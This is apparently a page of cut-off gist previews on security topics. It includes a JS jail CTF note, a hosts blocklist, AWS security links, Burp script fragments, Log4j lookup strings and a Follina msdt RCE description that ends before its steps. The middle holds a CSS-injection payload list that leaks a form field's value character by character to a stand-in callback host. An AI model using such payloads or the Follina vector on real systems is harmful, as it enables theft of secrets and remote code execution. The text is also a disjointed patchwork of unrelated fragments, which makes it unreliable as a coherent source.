Simple JS Jail challenge.
It is run on context, so we have nothing but to play with constructor
and console
.
1337 === eval(our_input)
# INDIHOM* | |
127.0.0.1 x-tags.net | |
127.0.0.1 a01.uadexchange.com | |
127.0.0.1 cdn.uzone.id | |
127.0.0.1 cdn3.uzone.id | |
127.0.0.1 cfs.uzone.id | |
127.0.0.1 csf.uzone.id | |
127.0.0.1 d01.notifa.info | |
127.0.0.1 d31qbv1cthcecs.cloudfront.net | |
127.0.0.1 d5nxst8fruw4z.cloudfront.net |
INTRO | |
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. | |
Short Link: http://tiny.cc/awssecurity | |
Official AWS Security Resources | |
* Security Blog - http://blogs.aws.amazon.com/security/ | |
* Security Advisories - http://aws.amazon.com/security/security-bulletins/ | |
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf | |
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf |
from burp import IBurpExtender | |
from burp import IHttpListener | |
from burp import IProxyListener | |
from burp import IScannerListener | |
from burp import IExtensionStateListener | |
from java.io import PrintWriter | |
from burp import IParameter | |
import datetime | |
import hashlib |
input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);} | |
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);} | |
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);} | |
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);} | |
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);} | |
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);} | |
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);} | |
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);} | |
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1); |
import xml.etree.ElementTree as ET | |
import urllib | |
import base64 | |
import math | |
import sys | |
import re | |
# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
# python burplist.py burprequests.xml | |
# output is saved to wordlist.txt |
${ctx:loginId} | |
${map:type} | |
${filename} | |
${date:MM-dd-yyyy} | |
${docker:containerId} | |
${docker:containerName} | |
${docker:imageName} | |
${env:USER} | |
${event:Marker} | |
${mdc:UserId} |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx: